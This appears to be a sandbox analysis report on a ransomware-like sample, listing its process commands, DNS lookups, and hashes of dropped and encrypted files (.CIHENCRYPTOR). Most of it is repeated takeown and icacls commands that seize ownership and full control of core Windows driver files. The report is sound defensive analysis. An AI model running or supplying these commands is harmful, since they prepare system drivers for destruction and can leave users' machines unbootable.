\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ndistapi.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ndiswan.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ndproxy.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\NDKPing.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\NdisVirtualBus.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netbios.sys && icacls C:\Windows\System32\drivers\netbios.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\Ndu.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netbt.sys && icacls C:\Windows\System32\drivers\netbt.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\NetAdapterCx.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\NDKPing.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ndiswan.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ndproxy.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netio.sys && icacls C:\Windows\System32\drivers\netio.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\Ndu.sys /grant "Admin:F"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\netbios.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\NetAdapterCx.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netvsc.sys && icacls C:\Windows\System32\drivers\netvsc.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\netbt.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\npfs.sys && icacls C:\Windows\System32\drivers\npfs.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\netbios.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\npsvctrig.sys && icacls C:\Windows\System32\drivers\npsvctrig.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nsiproxy.sys && icacls C:\Windows\System32\drivers\nsiproxy.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\netbt.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\netio.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\netvsc.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ntfs.sys && icacls C:\Windows\System32\drivers\ntfs.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\netvsc.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\netio.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ntosext.sys && icacls C:\Windows\System32\drivers\ntosext.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\npfs.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\null.sys && icacls C:\Windows\System32\drivers\null.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\nsiproxy.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\npsvctrig.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nvdimm.sys && icacls C:\Windows\System32\drivers\nvdimm.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\nsiproxy.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nvraid.sys && icacls C:\Windows\System32\drivers\nvraid.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\npsvctrig.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ntfs.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ntosext.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\npfs.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nvstor.sys && icacls C:\Windows\System32\drivers\nvstor.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ntfs.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nwifi.sys && icacls C:\Windows\System32\drivers\nwifi.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ntosext.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\null.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\nvdimm.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\nvraid.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pacer.sys && icacls C:\Windows\System32\drivers\pacer.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\parport.sys && icacls C:\Windows\System32\drivers\parport.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\null.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\nvstor.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\nvdimm.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\nvraid.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\nwifi.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\partmgr.sys && icacls C:\Windows\System32\drivers\partmgr.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\pacer.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pci.sys && icacls C:\Windows\System32\drivers\pci.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\nvstor.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pciide.sys && icacls C:\Windows\System32\drivers\pciide.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\nwifi.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\pacer.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pciidex.sys && icacls C:\Windows\System32\drivers\pciidex.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pcmcia.sys && icacls C:\Windows\System32\drivers\pcmcia.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pcw.sys && icacls C:\Windows\System32\drivers\pcw.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\partmgr.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\pci.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\pciide.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\pciidex.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\parport.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pdc.sys && icacls C:\Windows\System32\drivers\pdc.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\pcmcia.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\pciidex.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\pciide.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\parport.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\pci.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\partmgr.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\PEAuth.sys && icacls C:\Windows\System32\drivers\PEAuth.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\pcw.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\percsas2i.sys && icacls C:\Windows\System32\drivers\percsas2i.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\pcmcia.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\percsas3i.sys && icacls C:\Windows\System32\drivers\percsas3i.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\pcw.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\pdc.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\PEAuth.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\PktMon.sys && icacls C:\Windows\System32\drivers\PktMon.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\percsas2i.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\pdc.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\PEAuth.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pmem.sys && icacls C:\Windows\System32\drivers\pmem.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\percsas2i.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pnpmem.sys && icacls C:\Windows\System32\drivers\pnpmem.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\percsas3i.sys
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
Files
memory/1420-0-0x000002BDE8830000-0x000002BDE88BA000-memory.dmp
memory/1420-1-0x00007FFF04093000-0x00007FFF04095000-memory.dmp
memory/1420-2-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp
C:\Users\Admin\Desktop\DenyBlock.svgz.CIHENCRYPTOR
| MD5 | 94414b5857e6d8a50aa640532d0d533c |
| SHA1 | db4720d365666af70103b15518b4ff3c94f82e94 |
| SHA256 | 2ddec972f4741edaf7b3bf4eda7b1bb8f8ccc15c7648319ad5a1361b3fcb0f17 |
| SHA512 | 041f69e0c89ba4539d6bdd501d8ced1be11b54bf9bf104c1c226a4b7c8d56d0c9f401a1a0c90f78ea16a9e8db7ccc9e2b1baf00fbd7bd8b77f82692cec7dc513 |
C:\Users\Admin\Desktop\GroupFind.ppsm.CIHENCRYPTOR
| MD5 | f807c0151582d741f1cf80ea83e97f07 |
| SHA1 | 3d37e5e2ff5996724804a22e9dd7a2ae3808e38c |
| SHA256 | a5749bbd8daefa0325601eeac4eeb721932e7dfc9dc5b703da2916d1d9cda5ed |
| SHA512 | a6e181b14a7c98ec361edb42c887353bcc5a0d9ac9d361fea3caf4a70dcba991e50892812c50ee52b70aef14b9eb82449e37190581d75d05118c5f53e8fa4e52 |
C:\Windows\System32\kill.ico
| MD5 | 373d53d7c6709d5106b29a26a71b0d31 |
| SHA1 | 1708009c111266ba513503e06b94a5ccd402dee5 |
| SHA256 | de3f42bc53000d3dad58f3182108c414ce8062095ef390314fcc628473490c86 |
| SHA512 | 15b32cd9b87a9852d6ad0f03321edb15468e136a220ff4473bc109355c9b401a4c4f7eeb99ad7097c67f9cfac7c416f84038c0639e4db59561d2dbc74ef5d67d |
C:\Users\Admin\Desktop\○►®σ♥óñ¥↑♫Ÿ×œ4≈5╤5╠Æ×◘õ►☼☺õ½◙59▲5♥∩19σ±9♀«☼8₧Ÿ↕√8↕šÂ±≈ž◙ï¥Σ♂9◘¤∞4╚é╤71²Ÿ♪₧¥◄◘▼ř╥♀²♫π♠▌øœ▐²♠▐☼↑™σ♫◄♀±
| MD5 | 9e1e5883c74742a497cf5c272ccd2321 |
| SHA1 | 2cf33e34d08b8e17743a60352baffef4b6f02dee |
| SHA256 | ca687b6a7c3d29b566f3e1988b9f877b51d9a83ee25ffe0755a8dcd3eb5f434a |
| SHA512 | f2284f0c624cc07a65c16f87865bb98aaa176b1d8b45cd4fbcc1143c9c2297fe6b1d4db55ef054be2bc151c8cc25ff4da7c997b7d38dae3dccd2ffe1c3c01a6b |
memory/1420-142-0x00007FFF04093000-0x00007FFF04095000-memory.dmp
memory/1420-143-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp